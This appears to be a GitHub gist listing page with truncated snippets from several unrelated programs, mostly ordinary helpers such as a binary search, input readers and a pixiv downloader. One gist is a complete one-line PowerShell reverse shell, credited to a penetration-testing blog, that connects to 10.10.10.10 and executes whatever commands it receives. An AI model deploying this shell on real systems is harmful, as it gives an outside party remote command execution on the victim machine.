This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
import os | |
import sys | |
import struct | |
def reverse_byte_array(buffer): | |
"""将字节数组逆序排列""" | |
result = bytearray(buffer) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstdio> | |
#include <iostream> | |
#include <string> | |
#include <tuple> | |
template <typename... Ts> | |
std::tuple<Ts...> qread() | |
{ | |
return std::tuple<Ts...>{ ([]() -> Ts { Ts t; std::cin >> t; return t; })()... }; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
shopt -s extglob nullglob globstar | |
export TEXTDOMAIN=fcitx5 | |
__test_bash_unicode() { | |
local magic_str='${1}'$'\xe4'$'\xb8'$'\x80' | |
local magic_replace=${magic_str//\$\{/$'\n'$\{} | |
! [ "${magic_str}" = "${magic_replace}" ] | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",2333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::UTF8).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pixivpy3 import * | |
from pathlib import Path | |
from typing import * | |
from concurrent import futures | |
from os import system | |
import json |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def lower_bound(array, first, last, value): # 返回[first, last)内第一个不小于value的值的位置 | |
while first < last: # 搜索区间[first, last)不为空 | |
mid = first + (last - first) // 2 # 防溢出 | |
if array[mid] < value: | |
first = mid + 1 | |
else: | |
last = mid | |
return first # last也行,因为[first, last)为空的时候它们重合 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://aboutsimon.com/blog/2018/04/04/Python3-Type-Checking-And-Data-Validation-With-Type-Hints.html | |
from functools import wraps | |
from inspect import getfullargspec | |
from typing import get_type_hints | |
def validate_input(hints, **kwargs): | |
# iterate all type hints | |
for attr_name, attr_type in hints.items(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def array_split(A, k): | |
return [A[i:len(A):k] for i in range(k)] | |
# by std_xris @ telegram |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
use std::fmt::Debug; | |
use std::io; | |
use std::io::prelude::*; | |
use std::str::FromStr; | |
/// read into a specific type | |
/// | |
/// # Example: | |
/// | |
/// ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
to load allhex any where | |
copy allhex.py and __init__.py to folder "~/.local/lib/python3.7/site-packages/allhex/" | |
(3.7 is your python version) | |
''' | |
from .allhex import * |